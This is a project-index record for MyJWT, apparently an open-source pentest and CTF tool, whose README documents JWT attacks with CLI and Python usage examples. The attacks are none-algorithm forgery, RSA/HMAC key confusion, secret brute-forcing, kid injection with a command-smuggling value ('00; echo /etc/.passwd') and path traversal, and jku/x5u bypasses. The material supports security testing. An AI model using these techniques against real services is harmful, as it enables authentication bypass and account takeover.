{"id":13845890,"url":"https://github.com/tyki6/MyJWT","last_synced_at":"2025-07-12T03:32:51.036Z","repository":{"id":40572737,"uuid":"307492515","full_name":"tyki6/MyJWT","owner":"tyki6","description":"A cli for cracking, testing vulnerabilities on Json Web Token(JWT)","archived":false,"fork":false,"pushed_at":"2025-06-10T09:00:28.000Z","size":16257,"stargazers_count":134,"open_issues_count":3,"forks_count":18,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-07-11T03:49:12.710Z","etag":null,"topics":["blackarch","blackarch-packages","cli","ctf","jsonwebtoken","jwt","pentest","pentesting","pypi","python","rawsec","root-me","rootme","security","security-tools","websec"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/tyki6.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-10-26T20:11:56.000Z","updated_at":"2025-05-20T20:44:46.000Z","dependencies_parsed_at":"2023-10-01T21:24:30.574Z","dependency_job_id":"35b11842-c4c1-4f92-8fcd-b96370d0bb0b","html_url":"https://github.com/tyki6/MyJWT","commit_stats":{"total_commits":179,"total_committers":8,"mean_commits":22.375,"dds":0.6424581005586592,"last_synced_commit":"73c4d580e70de907352ad076ff70b137dd9e12e9"},"previous_names":["mbouamama/myjwt"],"tags_count":15,"template":false,"template_full_name":null,"purl":"pkg:github/tyki6/MyJWT","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tyki6%2FMyJWT","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/reposi
tories/tyki6%2FMyJWT/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tyki6%2FMyJWT/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tyki6%2FMyJWT/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/tyki6","download_url":"https://codeload.github.com/tyki6/MyJWT/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tyki6%2FMyJWT/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":264922634,"owners_count":23683678,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["blackarch","blackarch-packages","cli","ctf","jsonwebtoken","jwt","pentest","pentesting","pypi","python","rawsec","root-me","rootme","security","security-tools","websec"],"created_at":"2024-08-04T17:03:39.722Z","updated_at":"2025-07-12T03:32:49.981Z","avatar_url":"https://github.com/tyki6.png","language":"Python","funding_links":[],"categories":["Python"],"sub_categories":[],"readme":"# MyJWT\n[![mBouamama](https://github.com/mBouamama/MyJWT/workflows/Unit%20Test/badge.svg)](https://github.com/mBouamama/MyJWT)\n[![PyPI](https://img.shields.io/pypi/v/myjwt)](https://pypi.org/project/myjwt/)\n[![BlackArch package](https://repology.org/badge/version-for-repo/blackarch/myjwt.svg)](https://repology.org/project/myjwt/versions)\n[![PyPI - Python Version](https://img.shields.io/pypi/pyversions/myjwt)](https://pypi.org/project/myjwt/)\n[![PyPI - Download](https://pepy.tech/badge/myjwt)](https://pepy.tech/project/myjwt)\n[![GitHub release (latest by 
date)](https://img.shields.io/github/v/release/mBouamama/MyJWT)](https://github.com/mBouamama/MyJWT/releases)\n[![Documentation Status](https://readthedocs.org/projects/myjwt/badge/?version=latest)](https://myjwt.readthedocs.io/en/latest/?badge=latest)\n[![Rawsec's CyberSecurity Inventory](https://inventory.raw.pm/img/badges/Rawsec-inventoried-FF5050_flat.svg)](https://inventory.raw.pm/)\n[![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black)\n[![codecov](https://codecov.io/gh/mBouamama/MyJWT/branch/master/graph/badge.svg?token=V7yZJ1bZV9)](https://codecov.io/gh/mBouamama/MyJWT)\n[![docstr_coverage](./img/docstr_coverage_badge.svg)](https://github.com/HunterMcGushion/docstr_coverage.git)\n[![codebeat badge](https://codebeat.co/badges/1599eda5-d82b-41a1-93a1-dc8c51afc33f)](https://codebeat.co/projects/github-com-mbouamama-myjwt-master)\n[![Updates](https://pyup.io/repos/github/mBouamama/MyJWT/shield.svg)](https://pyup.io/repos/github/mBouamama/MyJWT/)\n[![Known Vulnerabilities](https://snyk.io/test/github/mBouamama/MyJWT/badge.svg?targetFile=requirements.txt)](https://snyk.io/test/github/mBouamama/MyJWT?targetFile=requirements.txt)\n# Introduction\nThis CLI is for pentesters, CTF players, or developers.\u003cbr\u003e\nYou can modify your JWT, sign it, inject into it, etc.\u003cbr\u003e\nCheck the [Documentation](http://myjwt.readthedocs.io) for more information.\u003cbr\u003e\nIf you find a problem or want an enhancement, open an issue. I will respond as soon as possible.\nEnjoy :)\n\n# Documentation\nDocumentation is available at http://myjwt.readthedocs.io\n# Table of Contents\n- [Features](#features)\n- [Installation](#installation)\n- [Usage](#usage)\n- [Examples](#examples)\n- [Download](#download)\n- [Contribute](#contribute)\n- [ChangeLog](#change-log)\n# Features\n- copy new JWT to clipboard\n- user interface (thanks [questionary](https://github.com/tmbo/questionary))\n- color output\n- modify JWT (header/payload)\n- None vulnerability\n- RSA/HMAC confusion\n- sign a JWT with a key\n- brute force to guess the key\n- crack a JWT with a regex to guess the key\n- kid injection\n- jku bypass\n- x5u bypass\n\n# Installation\nTo install myjwt, simply use pip:\n```\npip install myjwt\n```\nTo run myjwt from a Docker image, run:\n```\ndocker run -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt\n\n# mount volume for wordlist\ndocker run -v $(pwd)/wordlist:/home/wordlist/  -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt\n# On Windows\ndocker run -v %CD%/wordlist:/home/wordlist/  -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt\n```\nTo install myjwt from git:\n```\ngit clone https://github.com/mBouamama/MyJWT.git\ncd ./MyJWT\npip install -r requirements.txt\npython MyJWT/myjwt_cli.py --help\n```\n\nTo install myjwt on BlackArch:\n\n```\npacman -S myjwt\n```\n\n[![Packaging status](https://repology.org/badge/vertical-allrepos/myjwt.svg)](https://repology.org/project/myjwt/versions)\n\n# Usage\n```shell\n$ myjwt --help\nUsage: myjwt [OPTIONS] JWT\n\n  This cli is for pentesters, CTF players, or dev.\n  You can modify your jwt, sign, inject ,etc...\n  Full documentation is at http://myjwt.readthedocs.io.\n  If you see problems or enhancement send an issue.I will respond as soon as possible.\n  Enjoy :)\n  All new jwt will be copy to the clipboard.\n\nOptions:\n  --version                    Show the version and exit.\n  --full-payload TEXT          New payload for your jwt.Json format Required.\n  -h, --add-header TEXT        Add a new key, value to your jwt header, if key\n                               is present old value will be replaced.Format:\n                               key=value.\n\n  -p, --add-payload TEXT       Add a new key, value to your jwt payload, if\n                               key is present old value will be\n                               replaced.Format: key=value.\n\n  --sign TEXT                  Sign Your jwt with key given.\n  --verify TEXT                verify your key.\n  -none, --none-vulnerability  Check None Alg vulnerability.\n  --hmac PATH                  Check RS/HMAC Alg vulnerability.\n  --bruteforce PATH            Bruteforce to guess the secret used to sign the\n                               token.\n\n  -c, --crack TEXT             regex to iterate all string possibilities to\n                               guess the secret used to sign the token.\n\n  --kid TEXT                   Kid Injection sql\n  --jku TEXT                   Jku Header to bypass authentication\n  --x5u TEXT                   X5u Header to bypass authentication\n  --crt TEXT                   For x5cHeader, force crt file\n  --key TEXT                   For jku or x5c Header, force private key to\n                               your key file\n\n  --file TEXT                  For jku Header and x5u Header, force file name\n  --print                      Print Decoded JWT\n  -u, --url TEXT               Url to send your jwt.\n  -m, --method TEXT            Method use for send request to url.(Default\n                               GET).\n\n  -d, --data TEXT              Data send to your url.Format: key=value.
if\n                               value = MY_JWT value will be replace by new\n                               jwt.\n\n  -c, --cookies TEXT           Cookies to send to your url.Format: key=value.\n                               if value = MY_JWT value will be replace by new\n                               jwt.\n\n  --help                       Show this message and exit.\n```\n## Modify JWT\n\n| Option | Type | Example | Help |\n| --- | :---: | :---: | --- |\n| --full-payload | JSON | {\"user\": \"admin\"} | New payload for your JWT. |\n| -h, --add-header | key=value | user=admin | Add a new key/value to your JWT header; if the key is already present, the old value is replaced. |\n| -p, --add-payload | key=value | user=admin | Add a new key/value to your JWT payload; if the key is already present, the old value is replaced. |\n\n## Check Your JWT (HS alg)\n\n| Option | Type | Example | Help |\n| --- | --- | --- | --- |\n| --sign | text | mysecretkey | Sign your JWT with your key. |\n| --verify | text | mysecretkey | Verify your key. |\n\n## Exploit\n\n| Option | Type | Example | Help |\n| --- | --- | --- | --- |\n| -none, --none-vulnerability | Nothing | | Check the None algorithm vulnerability. |\n| --hmac | PATH | ./public.pem | Check the RS/HMAC algorithm confusion vulnerability and sign your JWT with the public key. |\n| --bruteforce | PATH | ./wordlist/big.txt | Brute force to guess the secret used to sign the token. Use a txt file with one password per line. |\n| --crack | REGEX | \"[a-z]{4}\" | Regex to iterate over all string possibilities to guess the secret used to sign the token. |\n| --kid | text | \"00; echo /etc/.passwd\" | Kid injection (SQL). |\n| --jku | text | MYPUBLICIP | Jku header to bypass authentication; use --file if you want to change your JWKS file name, and --key if you want to use your own private PEM. |\n| --x5u | text | MYPUBLICIP | X5u header to bypass authentication; use --file if you want to change your JWKS file name, and --key if you want to use your own private PEM. |\n\n## Send your JWT\n\n| Option | Type | Example | Help |\n| --- | --- | --- | --- |\n| -u, --url | url | http://challenge01.root-me.org/web-serveur/ch59/admin | URL to send your JWT to. |\n| -m, --method | text | POST | Method used to send the request to the URL (default: GET). |\n| -d, --data | key=value | secret=MY_JWT | Data sent to your URL. Format: key=value. 
If the value is MY_JWT, it will be replaced by your new JWT. |\n| -c, --cookies | key=value | secret=MY_JWT | Cookies to send to your URL. Format: key=value. If the value is MY_JWT, it will be replaced by your new JWT. |\n\n## Other\n\n| Option | Type | Example | Help |\n| --- | --- | --- | --- |\n| --crt | PATH | ./public.crt | For the x5c header, force the crt file. |\n| --key | PATH | ./private.pem | For the jku or x5c header, force the private key to your key file. |\n| --file | text | myfile | For the jku header, force the file name (without the .json extension). |\n| --print | Nothing | | Print the decoded JWT. |\n| --help | Nothing | | Show the help message and exit. |\n| --version | Nothing | | Show the myjwt version. |\n\n# Examples\n- [Modify Your JWT](#modify-your-jwt)\n- [None Vulnerability Check](#none-vulnerability)\n- [Sign Key](#sign-key)\n- [Brute Force Signature](#brute-force)\n- [RSA/HMAC Confusion](#rsahmac-confusion)\n- [Kid Injection](#kid-injection)\n- [Send your new JWT to url](#send-your-new-jwt-to-url)\n- [Jku Vulnerability](#jku-vulnerability)\n- [X5u Vulnerability](#x5u-vulnerability)\n## Modify your JWT\n### CLI\n```\nmyjwt YOUR_JWT --add-payload \"username=admin\" --add-header \"refresh=false\"\n```\n### Code\n```\nfrom myjwt.modify_jwt import add_header, change_payload\nfrom myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt\n\n# jwt is the encoded token string you want to modify\njwt_json = jwt_to_json(jwt)\njwt_json = add_header(jwt_json, {\"kid\": \"001\"})\njwt_json = change_payload(jwt_json, {\"username\": \"admin\"})\n# re-encode header and payload, keeping the original signature\njwt = encode_jwt(jwt_json) + \".\" + jwt_json[SIGNATURE]\n```\nFull example here: [01-modify-jwt](https://github.com/mBouamama/MyJWT/blob/master/examples/01-modify-jwt/modify-jwt.py)\n## None Vulnerability\n### CLI\n```\nmyjwt YOUR_JWT --none-vulnerability\n```\n### Code\n```\nfrom myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt\nfrom myjwt.vulnerabilities import none_vulnerability\n\njwt_json = jwt_to_json(jwt)\n# returns a token with the None algorithm set and an empty signature\njwt = none_vulnerability(encode_jwt(jwt_json) + \".\" + jwt_json[SIGNATURE])\n```\nFull example here: [02-none-vulnerability](https://github.com/mBouamama/MyJWT/blob/master/examples/02-none-vulnerability/none-vulnerability.py)\n## Sign Key\n### CLI\n```\nmyjwt YOUR_JWT --sign YOUR_KEY\n```\n### Code\n```\nfrom myjwt.modify_jwt import signature\nfrom myjwt.utils import jwt_to_json\n\nkey = \"test\"\n# re-sign the token with the given HMAC secret\njwt = signature(jwt_to_json(jwt), key)\n```\nFull example here: [03-sign-key](https://github.com/mBouamama/MyJWT/blob/master/examples/03-sign-key/sign-key.py)\n## Brute Force\n### CLI\n```\nmyjwt YOUR_JWT --bruteforce PATH\n```\n### Code\n```\nfrom myjwt.vulnerabilities import bruteforce_wordlist\n\nwordlist = \"../../wordlist/common_pass.txt\"\n# tries each line of the wordlist as the secret and returns the one that verifies\nkey = bruteforce_wordlist(jwt, wordlist)\n```\nFull example here: [04-brute-force](https://github.com/mBouamama/MyJWT/blob/master/examples/04-brute-force/brute-force.py)\n## Crack\n### CLI\n```\nmyjwt YOUR_JWT --crack REGEX\n```\n## RSA/HMAC Confusion\n### CLI\n```\nmyjwt YOUR_JWT --hmac FILE\n```\n### Code\n```\nfrom myjwt.vulnerabilities import confusion_rsa_hmac\n\nfile = \"public.pem\"\n# signs the token with HS256 using the RSA public key as the HMAC secret\njwt = confusion_rsa_hmac(jwt, file)\n```\nFull example here: [05-rsa-hmac-confusion](https://github.com/mBouamama/MyJWT/blob/master/examples/05-rsa-hmac-confusion/rsa-hmac-confusion.py)\n## Kid Injection\n### CLI\n```\nmyjwt YOUR_JWT --kid INJECTION\n```\n### Code\n```\nfrom myjwt.modify_jwt import signature\nfrom myjwt.utils import jwt_to_json\nfrom myjwt.vulnerabilities import inject_sql_kid\n\ninjection = \"../../../../../../dev/null\"\nsign = \"\"\njwt = inject_sql_kid(jwt, injection)\n# sign with an empty secret to match the empty key the injected kid points at\njwt = signature(jwt_to_json(jwt), sign)\n```\nFull example here: [06-kid-injection](https://github.com/mBouamama/MyJWT/blob/master/examples/06-kid-injection/kid-injection.py)\n\n## Send your new JWT to url\n\n### CLI\n```\nmyjwt YOUR_JWT -u YOUR_URL -c \"jwt=MY_JWT\" --none-vulnerability --add-payload \"username=admin\"\n```\n\n## Jku Vulnerability\n### CLI\n```\nmyjwt YOUR_JWT --jku YOUR_URL\n```\n### Code\n```\nfrom myjwt.vulnerabilities import jku_vulnerability\n\nnew_jwt = jku_vulnerability(jwt=jwt, url=\"MYPUBLIC_IP\")\nprint(new_jwt)\n```\nFull example here: [07-jku-bypass](https://github.com/mBouamama/MyJWT/blob/master/examples/07-jku-bypass/jku-bypass.py)\n## X5U Vulnerability\n### CLI\n```\nmyjwt YOUR_JWT --x5u YOUR_URL\n```\n### Code\n```\nfrom myjwt.vulnerabilities import x5u_vulnerability\n\nnew_jwt = x5u_vulnerability(jwt=jwt, url=\"MYPUBLIC_IP\")\nprint(new_jwt)\n```\nFull example here: [08-x5u-bypass](https://github.com/mBouamama/MyJWT/blob/master/examples/08-x5u-bypass/x5u-bypass.py)\n\n# Download\nCheck the GitHub releases. The latest is available at https://github.com/mBouamama/MyJWT/releases/latest\n# Contribute\n- Fork this repository or clone it\n- Create a new branch (feature, hotfix, etc.)\n- Make the necessary changes and commit them\n- Check lint with `make lint`\n- Check unit tests with `make test`\n- Send a pull request\n\nI will check it as soon as possible.\n\n# Change log\n\nThe log has become rather long. It moved to its own file.\n\nSee [CHANGES](https://github.com/mBouamama/MyJWT/blob/master/CHANGELOG.md).\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftyki6%2FMyJWT","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ftyki6%2FMyJWT","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftyki6%2FMyJWT/lists"}